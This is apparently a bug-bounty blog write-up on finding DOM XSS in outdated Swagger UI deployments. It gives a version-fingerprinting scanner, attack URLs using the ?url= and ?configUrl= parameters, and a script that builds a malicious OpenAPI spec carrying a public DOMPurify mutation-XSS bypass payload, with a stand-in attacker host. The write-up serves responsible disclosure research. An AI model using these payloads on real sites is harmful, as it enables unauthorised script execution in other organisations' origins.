Found +6 DomXSS at different programs (Hacking Swagger-UI)

Adham sayed (doosec101)
2 min read · Apr 19, 2023


Hi guys! In this article I will talk about how I was able to find 6+ DOM XSS bugs in public programs at HackerOne, Bugcrowd and Intigriti.

While hunting, most of us come across the Swagger UI library and ignore it. What you may not know is that many deployed Swagger UI instances are vulnerable to DOM XSS because they bundle an outdated version of `DOMPurify`, the library Swagger UI uses to sanitize the HTML it renders from the API specification.

Dups :(

So... what is Swagger UI?

Swagger UI is a very common library used to display API specifications in a nice-looking UI; almost every company uses it.
Swagger UI lets the user point it at an API specification (a YAML or JSON file) through a query parameter, fetches that file and renders it. Markdown in the specification (for example `info.description`) is converted to HTML, passed through DOMPurify and then injected into the page via React's `dangerouslySetInnerHTML`. When the bundled DOMPurify is an old version with a known bypass, a malicious specification file loaded this way runs script in the origin of the Swagger UI page.

Recon process, and how to find subdomains that are using Swagger UI:-

1. Collect as many subdomains of your targets as you can.
2. Scan them and see which are alive.
3. I use my own tool, https://github.com/doosec101/swagger_scanner, to find Swagger UI endpoints, and with the help of the Swagger nuclei template I was able to discover 100+ of my targets using Swagger UI, but 6+ of them were vulnerable to DOM XSS.
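Steps 1 to 3 above are the author's process, and the scanner linked in step 3 is the author's own tool. What follows is an added example, not the author's swagger_scanner and not a Swagger UI project script, of the check that tool and the nuclei template automate: fingerprint a response body as Swagger UI, pull the version out of a CDN asset URL when one is present, and test it against the affected range stated later in this write-up. The probe paths, the sample page bodies and the host names are assumptions; none of it is captured from a real target.

```python
import re
from urllib.error import URLError
from urllib.request import Request, urlopen

# Paths where Swagger UI is commonly mounted (assumption: a starting list, extend per target).
COMMON_PATHS = (
    "/swagger-ui.html", "/swagger-ui/", "/swagger-ui/index.html",
    "/swagger/index.html", "/api-docs/", "/docs", "/api/docs",
)

# Strings that identify a Swagger UI page body.
MARKERS = ("swagger-ui-bundle", "SwaggerUIBundle", "swagger-ui.css", 'id="swagger-ui"')

# Version embedded in CDN asset URLs, e.g.
#   https://unpkg.com/swagger-ui-dist@3.25.0/swagger-ui-bundle.js
#   https://cdnjs.cloudflare.com/ajax/libs/swagger-ui/3.30.1/swagger-ui.css
VERSION_RE = re.compile(r"swagger-ui(?:-dist)?[@/](\d+\.\d+\.\d+)")

AFFECTED_MIN = (3, 14, 1)  # inclusive, range from the write-up
AFFECTED_MAX = (3, 38, 0)  # exclusive


def parse_version(text):
    return tuple(int(part) for part in text.split("."))


def is_affected(version):
    """True/False for a known version; None when no version could be read."""
    if version is None:
        return None
    return AFFECTED_MIN <= parse_version(version) < AFFECTED_MAX


def assess(html):
    """Classify one response body: (is_swagger_ui, version_or_None, affected_or_None)."""
    if not any(marker in html for marker in MARKERS):
        return (False, None, None)
    match = VERSION_RE.search(html)
    version = match.group(1) if match else None
    return (True, version, is_affected(version))


def scan_host(base_url, timeout=5):
    """Live check (network): probe COMMON_PATHS, return [(url, version, affected)] for hits."""
    hits = []
    for path in COMMON_PATHS:
        url = base_url.rstrip("/") + path
        try:
            req = Request(url, headers={"User-Agent": "swagger-ui-version-check"})
            body = urlopen(req, timeout=timeout).read().decode("utf-8", "replace")
        except (URLError, OSError, ValueError):
            continue
        found, version, affected = assess(body)
        if found:
            hits.append((url, version, affected))
    return hits


# Constructed sample bodies (not captured from any real target).
SAMPLE_OLD = ('<link rel="stylesheet" href="https://unpkg.com/swagger-ui-dist@3.25.0/swagger-ui.css">'
              '<div id="swagger-ui"></div>'
              '<script src="https://unpkg.com/swagger-ui-dist@3.25.0/swagger-ui-bundle.js"></script>')
SAMPLE_NEW = '<script src="https://cdnjs.cloudflare.com/ajax/libs/swagger-ui/4.15.5/swagger-ui-bundle.js"></script>'
SAMPLE_LOCAL = '<div id="swagger-ui"></div><script src="./swagger-ui-bundle.js"></script>'  # self-hosted, no version in URL
SAMPLE_OTHER = "<html><body>nothing here</body></html>"

if __name__ == "__main__":
    for name, body in [("old", SAMPLE_OLD), ("new", SAMPLE_NEW), ("local", SAMPLE_LOCAL), ("other", SAMPLE_OTHER)]:
        print(name, assess(body))
    # Live use (assumed host): print(scan_host("https://target.example"))
```

A self-hosted bundle with no version in its URL comes back as `(True, None, None)`: that is a Swagger UI hit that still needs a manual check, not a clean result, and the only reliable confirmation is the payload test from the exploitation section.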

Dups again 😞

Time To Exploit:-

Swagger UI versions affected by the XSS: >=3.14.1 and <3.38.0

1. Once you have the Swagger UI endpoints, append `?configUrl=https://jumpy-floor.surge.sh/test.json` to them. Sometimes that payload won't work, so also check `?url=https://jumpy-floor.surge.sh/test.yaml` (both files are hosted by the Vidoc Security write-up referenced below). `url` points Swagger UI straight at a specification, while `configUrl` points it at a configuration JSON whose `url` key in turn names the specification, which is why one is sometimes accepted where the other is filtered. Two caveats: a specification you host yourself must be served with a permissive `Access-Control-Allow-Origin` header, because Swagger UI fetches it cross-origin; and recent Swagger UI releases ignore query-string configuration unless the deployer enabled `queryConfigEnabled`, so an in-range version that reacts to neither parameter is still running an outdated sanitizer but is not exploitable through the URL.
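As an added example (not the author's code, and not the contents of the test.json/test.yaml files hosted by the referenced write-up), the script below builds the two artifacts an attacker hosts, a specification whose `info.description` carries the payload and a configuration file pointing at it, plus the two URLs to send for the `url` and `configUrl` entry points. The payload is the public DOMPurify < 2.0.17 mutation-XSS bypass; that it is the bypass the affected builds fall to is an assumption, as are the `target.example` and `attacker.example` hosts.

```python
import json
from pathlib import Path
from urllib.parse import urlencode

# Public DOMPurify < 2.0.17 mutation-XSS bypass (Bentkowski, 2020). Assumption: the outdated
# DOMPurify bundled by affected Swagger UI builds falls to it; swap in whatever bypass matches
# the bundled version. alert(document.domain) proves the origin without doing anything else.
PAYLOAD = ('<form><math><mtext></form><form><mglyph><style></math>'
           '<img src onerror=alert(document.domain)>')


def build_spec(payload=PAYLOAD):
    """Minimal OpenAPI 2.0 document. info.description is rendered as Markdown (raw HTML kept),
    passed through DOMPurify and injected with dangerouslySetInnerHTML, so the payload goes there."""
    return {
        "swagger": "2.0",
        "info": {"title": "poc", "version": "1.0.0", "description": payload},
        "paths": {},
    }


def build_config(spec_url):
    """Config object for ?configUrl=; Swagger UI applies its keys as settings, `url` selects the spec."""
    return {"url": spec_url}


def build_attack_urls(swagger_ui_url, spec_url, config_url):
    """The two entry points the write-up uses: ?url= (spec directly) and ?configUrl= (config -> spec)."""
    return {
        "url": swagger_ui_url + "?" + urlencode({"url": spec_url}),
        "configUrl": swagger_ui_url + "?" + urlencode({"configUrl": config_url}),
    }


def write_poc_files(out_dir, spec_url):
    """Write spec.json and config.json to serve from your own host. That host must send
    Access-Control-Allow-Origin: * because Swagger UI fetches both files cross-origin."""
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    (out / "spec.json").write_text(json.dumps(build_spec(), indent=2))
    (out / "config.json").write_text(json.dumps(build_config(spec_url), indent=2))
    return sorted(p.name for p in out.iterdir())


if __name__ == "__main__":
    # Hypothetical hosts, for illustration only.
    target = "https://target.example/swagger-ui/index.html"
    attacker = "https://attacker.example"
    print(write_poc_files("poc", attacker + "/spec.json"))
    for kind, link in build_attack_urls(target, attacker + "/spec.json", attacker + "/config.json").items():
        print(kind, link)
```

Serving your own files rather than a third party's keeps the report reproducible after the other host disappears, and lets you swap the payload for one matching whatever DOMPurify version the target actually bundles.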

Examples:-

Finally I got 3 triaged and one dup again 😆

References:-

This write-up was inspired by https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

Hope you learned something new. Here's my profile on HackerOne:- https://hackerone.com/doosec101



Adham sayed (doosec101)

I am 21 years old, bug hunter at HackerOne https://hackerone.com/doosec101, security researcher, web application pen testing, mobile pen testing, Python scripter.